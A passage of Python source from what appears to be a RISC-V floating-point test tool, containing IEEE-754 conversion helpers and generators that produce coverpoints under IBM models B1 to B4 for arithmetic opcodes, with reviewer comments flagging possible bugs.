    # '1' prefix preserves leading zero bits; [3:] drops the '0b1' prefix.
    bin_val = bin(int('1' + hexstr[2:], 16))[3:]
    sgn = bin_val[0]
    exp = bin_val[1:e_sz + 1]
    man = bin_val[e_sz + 1:]
    unbiased = int(exp, 2) - bias
    if unbiased < e_min:
        # Subnormal (or zero): no implicit leading 1, exponent pinned to e_min.
        mantissa = 0.0
        scale = e_min
    else:
        mantissa = 1.0
        scale = unbiased
    # Accumulate the fraction bit by bit exactly as the original did, so the
    # resulting float matches the old eval()-based computation exactly.
    for i in range(len(man)):
        mantissa += (1 / (pow(2, i + 1))) * int(man[i])
    value = mantissa * pow(2, scale)
    if sgn == '1':
        value = -value
    if flen == 32:
        # Preserve the original clamp: tiny magnitudes become +/-1e-45.
        if value > 1e-45 or value < -1e-45:
            return value
        return 1e-45 if sgn == '0' else -1e-45
    return value
def floatingPoint_tohex(flen,float_no):    # Decimal -> IEEE-754 Hex Converter
    '''
    Convert a Python float into its IEEE-754 hex encoding of the requested
    width.

    :param flen: Size of the floating point registers (32 or 64)
    :param float_no: value to convert (a float; +/-inf are handled first)
    :type flen: int
    :type float_no: float
    :return: zero-padded hex literal string.  On exponent overflow the
             most positive/negative representable value is returned.

    Bug fixed: the 64-bit negative-overflow branch previously returned the
    malformed literal "0x0xFFEFFFFFFFFFFFFF" (doubled '0x' prefix).
    '''
    # Infinities map straight onto the canonical +/-inf encodings.
    if(flen==32):
        if(str(float_no)=='-inf'):
            return(finfinity[1])
        elif(str(float_no)=='inf'):
            return(finfinity[0])
    elif(flen==64):
        if(str(float_no)=='-inf'):
            return(dinfinity[1])
        elif(str(float_no)=='inf'):
            return(dinfinity[0])
    float_no=float.hex(float_no)
    num="N"                                 # "N" = normal, "SN" = subnormal
    a=float.fromhex(float_no)
    sign=0
    if(a<0 or str(a)[0]=='-'):              # the str() check also catches -0.0
        sign=1
    nor=float.hex(a)                        # Normalized Number
    if(flen==32):
        if(int(nor.split("p")[1])<-126):    # Checking Underflow of Exponent
            exp_bin=('0'*8)                 # Exponent of Subnormal numbers
            exp_sn=int(nor.split("p")[1])
            num="SN"
        elif(int(nor.split("p")[1])>127):   # Checking Overflow of Exponent
            if(sign==0):
                return "0x7f7fffff"         # Most Positive Value
            else:
                return "0xff7fffff"         # Most Negative Value
        else:                               # Converting Exponent to 8-Bit Binary
            exp=int(nor.split("p")[1])+127
            exp_bin=('0'*(8-(len(bin(exp))-2)))+bin(exp)[2:]
    elif(flen==64):
        # float.hex() of a subnormal double starts '0x0.' — the leading
        # digit before the '.' is 0, which is what check_sn detects.
        check_sn = nor.split("p")[0].split(".")[0]
        if(int(check_sn[len(check_sn)-1])==0):  # Checking Underflow of Exponent
            exp_bin=('0'*11)                    # Exponent of Subnormal numbers
            exp_sn=int(nor.split("p")[1])
            num="SN"
        elif(int(nor.split("p")[1])>1023):      # Checking Overflow of Exponent
            if(sign==0):
                return "0x7FEFFFFFFFFFFFFF"     # Most Positive Value
            else:
                # Fixed: was the malformed string "0x0xFFEFFFFFFFFFFFFF".
                return "0xFFEFFFFFFFFFFFFF"     # Most Negative Value
        else:                                   # Converting Exponent to 11-Bit Binary
            exp=int(nor.split("p")[1])+1023
            exp_bin=('0'*(11-(len(bin(exp))-2)))+bin(exp)[2:]
    # Slice off the '0x1.' / '-0x1.' prefix to isolate the fraction digits.
    if(num=="SN"):
        if(sign==0):
            mant="0x"+float_no.split("p")[0][4:]
        else:
            mant="0x"+float_no.split("p")[0][5:]
    else:
        if(sign==0):
            mant="0x"+nor.split("p")[0][4:]
        else:
            mant="0x"+nor.split("p")[0][5:]
    if(flen==32):
        mant_bin=bin(int('1'+mant[2:],16))[3:]
        if(num == "SN"):
            # Re-insert the hidden bit and shift right until the exponent
            # reaches the single-precision subnormal minimum (-127).
            mant_bin='1'+bin(int('1'+mant[2:],16))[3:]
            while(exp_sn!=-127):
                exp_sn+=1
                mant_bin = '0'+mant_bin
        binary="0b"
        binary=binary+str(sign)+exp_bin+mant_bin[0:23]
        hex_tp=hex(int(binary,2))
        # Left-pad to 8 hex digits (leading zeros are lost by hex()).
        hex_tp=hex_tp.replace('0x','0x'+'0'*(8-(len(hex_tp)-2)))
    elif(flen==64):
        mant_bin=bin(int('1'+mant[2:],16))[3:]
        if(num == "SN"):
            mant_bin=bin(int('1'+mant[2:],16))[3:]
        binary="0b"
        binary=binary+str(sign)+exp_bin+mant_bin[0:52]
        hex_tp=hex(int(binary,2))
        # Left-pad to 16 hex digits.
        hex_tp=hex_tp.replace('0x','0x'+'0'*(16-(len(hex_tp)-2)))
    return(hex_tp)
def unique_cpts(x):
    '''
    Return the coverpoints of *x* with duplicates removed, keeping the
    order of first appearance.
    '''
    # dict keys are insertion-ordered, so fromkeys() both deduplicates
    # and preserves first-seen order — same result as the original
    # hand-rolled counting dict.
    return list(dict.fromkeys(x))
def comments_parser(coverpoints):
    '''
    Split each 'condition # comment' coverpoint string into a
    (condition, comment) tuple, tagging every condition with ' #nosat'.
    '''
    parsed = []
    for entry in coverpoints:
        fields = entry.split("#")
        condition, comment = fields[0], fields[1]
        parsed.append((condition + " #nosat", comment))
    return parsed
def ibm_b1(flen, opcode, ops):
    '''
    IBM Model B1 Definition:
        Test all combinations of floating-point basic types, positive and negative, for
        each of the inputs. The basic types are Zero, One, MinSubNorm, SubNorm,
        MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, and
        SNaN.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode

    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operands =>
        [Zero, One, MinSubNorm, SubNorm, MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, SNaN]

    Implementation:
        - Dependent on the value of flen, a predefined dataset of floating point values are added.
        - Using the itertools package, an iterative multiplication is performed with two lists to create an exhaustive combination of all the operand values.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with the respective rounding mode for that particular opcode.
    '''
    # Two representatives (one +ve, one -ve) are picked from each pool.
    if flen == 32:
        basic_types = fzero + fminsubnorm + [fsubnorm[0], fsubnorm[3]] +\
            fmaxsubnorm + fminnorm + [fnorm[0], fnorm[3]] + fmaxnorm + \
            finfinity + fdefaultnan + [fqnan[0], fqnan[3]] + \
            [fsnan[0], fsnan[3]] + fone
    elif flen == 64:
        basic_types = dzero + dminsubnorm + [dsubnorm[0], dsubnorm[1]] +\
            dmaxsubnorm + dminnorm + [dnorm[0], dnorm[1]] + dmaxnorm + \
            dinfinity + ddefaultnan + [dqnan[0], dqnan[1]] + \
            [dsnan[0], dsnan[1]] + done
    else:
        logger.error('Invalid flen value!')
        sys.exit(1)

    # the following creates a cross product for ops number of variables
    b1_comb = list(itertools.product(*ops*[basic_types]))
    coverpoints = []
    for c in b1_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        # NOTE(review): "fmv" appears twice in the first list below; one of
        # the entries may have been intended as a different opcode — confirm.
        # NOTE(review): an opcode matching none of the three lists leaves the
        # condition ending in a dangling " and " with no rm clause — confirm.
        if opcode.split('.')[0] in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
            cvpt += 'rm_val == 0'
        elif opcode.split('.')[0] in ["fclass","flt","fmax","fsgnjn"]:
            cvpt += 'rm_val == 1'
        elif opcode.split('.')[0] in ["feq","flw","fsw","fsgnjx"]:
            cvpt += 'rm_val == 2'
        cvpt += ' # '
        # Human-readable echo of the operand values for the comment part.
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B1 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b2(flen, opcode, ops, int_val = 100, seed = -1):
    '''
    IBM Model B2 Definition:
        This model tests final results that are very close, measured in Hamming
        distance, to the specified boundary values. Each boundary value is taken as a
        base value, and the model enumerates over small deviations from the base, by
        flipping one bit of the significand.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param int_val: Number to define the range in which the random value is to be generated. (Predefined to 100)
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type int_val: int
    :param seed: int

    Abstract Dataset Description:
        Final Results = [Zero, One, MinSubNorm, MaxSubNorm, MinNorm, MaxNorm]
        Operand1 {operation} Operand2 = Final Results

    Implementation:
        - Hamming distance is calculated using an xor operation between a number in the dataset and a number generated using walking ones operation.
        - A random operand value for one of the operands is assigned and based on the result and operation under consideration, the next operand is calculated.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with the respective rounding mode for that particular opcode.
    '''
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        # NOTE(review): 'b' and (below) 'rs1_exp'/'rs3_exp' are assigned but
        # never used — confirm whether they are leftovers.
        b = '0x00000010'
        e_sz=8
        m_sz = 23
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        b = '0x0000000000000010'
        e_sz=11
        m_sz = 52

    result = []
    b2_comb = []
    opcode = opcode.split('.')[0]
    # Per-opcode fixed seeds keep generated coverpoints reproducible when no
    # explicit seed is supplied.
    # NOTE(review): `opcode in 'fadd'` is a substring test, not equality
    # (e.g. 'add' would also match) — confirm intended.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    # Walking-ones over the significand: flip one bit at a time (k = 1,2,4,...).
    # NOTE(review): range(1,24) walks only 23 bit positions even for flen==64
    # (52-bit significand) — confirm whether intended.
    for i in range(len(flip_types)):
        k=1
        for j in range (1,24):
            #print('{:010b}'.format(k))
            result.append(['0x'+hex(eval(bin(int('1'+flip_types[i][2:], 16))) ^ eval('0b'+'{:023b}'.format(k)))[3:],' | Result = '+num_explain(flen, '0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:]))+'(0x'+str(hex(eval(bin(int('1'+flip_types[i][2:], 16))))[3:])+')^'+str('0x'+hex(eval('0b'+'1'+'{:024b}'.format(k)))[3:])])
            k=k*2
    for i in range(len(result)):
        # Decompose the desired result, then pick a random rs1 (and rs3) with
        # the same exponent and back-solve rs2 so that op(rs1,rs2[,rs3])
        # lands on the desired result.
        bin_val = bin(int('1'+result[i][0][2:],16))[3:]
        rsgn = bin_val[0]
        rexp = bin_val[1:e_sz+1]
        rman = bin_val[e_sz+1:]
        rs1_exp = rs3_exp = rexp
        rs1_bin = bin(random.randrange(1,int_val))
        rs3_bin = bin(random.randrange(1,int_val))
        rs1_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs1_bin)-2)))+rs1_bin[2:])
        rs3_bin = ('0b0'+rexp+('0'*(m_sz-(len(rs3_bin)-2)))+rs3_bin[2:])
        rs1 = fields_dec_converter(flen,'0x'+hex(int('1'+rs1_bin[2:],2))[3:])
        rs3 = fields_dec_converter(flen,'0x'+hex(int('1'+rs3_bin[2:],2))[3:])
        if opcode in 'fadd':
            rs2 = fields_dec_converter(flen,result[i][0]) - rs1
        elif opcode in 'fsub':
            rs2 = rs1 - fields_dec_converter(flen,result[i][0])
        elif opcode in 'fmul':
            rs2 = fields_dec_converter(flen,result[i][0])/rs1
        elif opcode in 'fdiv':
            # NOTE(review): when the result decodes to 0, rs2 keeps its value
            # from the previous iteration (or is unbound on the first) —
            # confirm the dataset ordering guarantees a prior assignment.
            if fields_dec_converter(flen,result[i][0]) != 0:
                rs2 = rs1/fields_dec_converter(flen,result[i][0])
        elif opcode in 'fsqrt':
            rs2 = fields_dec_converter(flen,result[i][0])*fields_dec_converter(flen,result[i][0])
        elif opcode in 'fmadd':
            rs2 = (fields_dec_converter(flen,result[i][0]) - rs3)/rs1
        elif opcode in 'fnmadd':
            rs2 = (rs3 - fields_dec_converter(flen,result[i][0]))/rs1
        elif opcode in 'fmsub':
            rs2 = (fields_dec_converter(flen,result[i][0]) + rs3)/rs1
        elif opcode in 'fnmsub':
            rs2 = -1*(rs3 + fields_dec_converter(flen,result[i][0]))/rs1
        if(flen==32):
            # Round-trip through binary32 so rs2 is representable in 32 bits.
            m = struct.unpack('f', struct.pack('f', rs2))[0]
        elif(flen==64):
            m = rs2
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m)))
        elif opcode in 'fsqrt':
            b2_comb.append((floatingPoint_tohex(flen,m),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b2_comb.append((floatingPoint_tohex(flen,rs1),floatingPoint_tohex(flen,m),floatingPoint_tohex(flen,rs3)))
    #print("b2_comb",b2_comb)
    coverpoints = []
    k=0
    for c in b2_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += result[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B2 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b3(flen, opcode, ops, seed=-1):
    '''
    IBM Model B3 Definition:
        This model tests all combinations of the sign, significand’s LSB, guard bit & sticky bit of the intermediate result.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int

    Abstract Dataset Description:
        Intermediate Result is chosen at random
        Intermediate Result = [All possible combinations of Sign, LSB, Guard and Sticky are taken]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The Sticky bit is 1 if there were non-zero digits to the right of the guard digit, hence the lsb list is subjected to that condition.
        - Float_val [ a list of numbers ] extracted from the fields_dec_converter is checked for the LSB. If it is a negative number, then the list ieee754_num is appended with splitting the p character and first 10 characters in the 0th split + ‘p’ + other part of the split. “p” specifies the maximum available number in python and used in 64 bit architecture. If we require a digit more than thea number, then we represent it using a string because an int
        - Now the ir_dataset is initialized and since the ieee754_num list has the same element twice [ first is just the number and second is with sign ], hence we loop that array, considering only multiples of 2 elements from it. If the sign is ‘-’, then then the index is updated with 1 else if it is ‘+’, then it is updated with 0 complying with the IEEE standards.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    # Per-opcode fixed seeds keep generated coverpoints reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_num = []
        lsb = []
        # Each source value is recorded twice (once per sign), so the lsb
        # flag is appended twice to stay index-aligned with ieee754_num.
        for i in fsubnorm+fnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
                ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
            else:
                ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
                ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
        ir_dataset = []
        # i = 2,4,...,14 encodes the trailing Guard/Round/Sticky(+pad) bits
        # appended to the hex significand; grs is its 4-bit binary form.
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        lsb = []
        for i in dsubnorm+dnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = str(fields_dec_converter(64,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val)
                ieee754_num.append('-'+float_val)
            else:
                ieee754_num.append(float_val)
                ieee754_num.append(float_val[1:])
        ir_dataset = []
        # For 64-bit the GRS deviation is added decimally via Decimal to
        # keep precision beyond a double's 53 bits.
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
    b4_comb = []
    # Back-solve rs2 so that op(rs1, rs2[, rs3]) produces the desired
    # intermediate result (Decimal arithmetic for the 64-bit flavour).
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used afterwards
        # (b4_comb uses rs1/rs2/rs3 directly) — confirm leftover.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k = 0
    # One coverpoint per operand combination per rounding mode (0..4).
    for c in b4_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B3 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b4(flen, opcode, ops, seed=-1):
    '''
    IBM Model B4 Definition:
        This model creates a test-case for each of the following constraints on the
        intermediate results:
            1. All the numbers in the range [+MaxNorm – 3 ulp, +MaxNorm + 3 ulp]
            2. All the numbers in the range [-MaxNorm - 3 ulp, -MaxNorm + 3 ulp]
            3. A random number that is larger than +MaxNorm + 3 ulp
            4. A random number that is smaller than -MaxNorm – 3 ulp
            5. One number for every exponent in the range [MaxNorm.exp - 3, MaxNorm.exp + 3] for positive and negative numbers

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int

    Abstract Dataset Description:
        Intermediate Results = [[MaxNorm-3 ulp, MaxNorm+3 ulp], [-MaxNorm-3 ulp, -MaxNorm+3 ulp], Random Num > MaxNorm+3 ulp, Random Num < -MaxNorm-3 ulp, [MaxNorm.exp-3, MaxNorm.exp+3]]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the “Decimal” module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the “floatingPoint_tohex” function.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    # Per-opcode fixed seeds keep generated coverpoints reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    if flen == 32:
        ieee754_maxnorm_p = '0x1.7fffffp+127'
        ieee754_maxnorm_n = '0x1.7ffffep+127'
        maxnum = float.fromhex(ieee754_maxnorm_p)
        ir_dataset = []
        # i = 2,4,...,14 appends the Guard/Round/Sticky deviation as an
        # extra hex digit beyond MaxNorm's significand.
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
            ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
        # One +ve and one -ve value per exponent in [MaxNorm.exp-3, MaxNorm.exp+3].
        for i in range(-3,4):
            ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = +ve'])
            ir_dataset.append(['-'+ieee754_maxnorm_n.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = -ve'])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        maxdec_p = str(maxnum)
        maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
        ir_dataset = []
        # The 64-bit deviations are added decimally with Decimal, since they
        # can exceed what a Python float can represent.
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
            ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
        for i in range(-3,4):
            ir_dataset.append([str(random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = +ve'])
            ir_dataset.append([str(-1*random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = -ve'])
    b4_comb = []
    # Back-solve rs2 so that op(rs1, rs2[, rs3]) produces the desired
    # intermediate result (Decimal arithmetic for the 64-bit flavour).
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
